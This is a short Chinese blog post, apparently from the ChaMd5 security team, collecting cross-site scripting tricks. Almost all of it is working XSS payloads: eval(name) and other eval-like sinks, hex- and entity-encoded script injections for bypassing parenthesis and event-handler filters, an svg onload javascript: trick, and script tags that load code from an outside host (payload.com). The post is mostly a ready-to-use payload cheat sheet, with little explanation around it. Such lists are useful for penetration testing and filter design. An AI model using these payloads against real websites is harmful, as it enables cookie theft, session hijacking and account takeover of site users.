香香的xss小记录

Posted 2021-04-29 ChaMd5安全团队

0x00 前言

总结的一些xss的技巧（可能会持续更新），愿大佬勿喷，还有什么方法，大佬记得分享啊。有什么看不惯的错误请在本文留言，谢谢。

0x01 我认为最短的执行任意js代码

eval(name);

poc：

<iframe src='http://localhost/?xss=eval(name);' name='js-code'>

0x02 类似eval的方法

setTimeout(location.hash.slice(1))

setInterval(location.hash.slice(1))

Function(location.hash.slice(1))(1)

jQuery.globalEval(location.hash.slice(1))

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

document.getElementById('xx').innerhtml=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

0x03 当括号被过滤执行任意payload的方法

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

<svg/onload="location='javascript:/*'%2blocation.hash">
锚点后接*/jscode

0x04 事件被过滤时执行任意payload

<link rel=import href=\\payload.com>

<script src=\\payload.com></script>

<iframe srcdoc="&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x29;&#x3E;"></iframe>

---

欢迎各位大牛指点   欢迎各位大牛投稿

关于文章的建议和意见都可以留言告诉我们呢

（撒花）

投稿至：admin@chamd5.org

ChaMd5的小八卦全在这里哟~比心❤

................ChaMd5安全团队................

悄悄的告诉你

关注会有小惊喜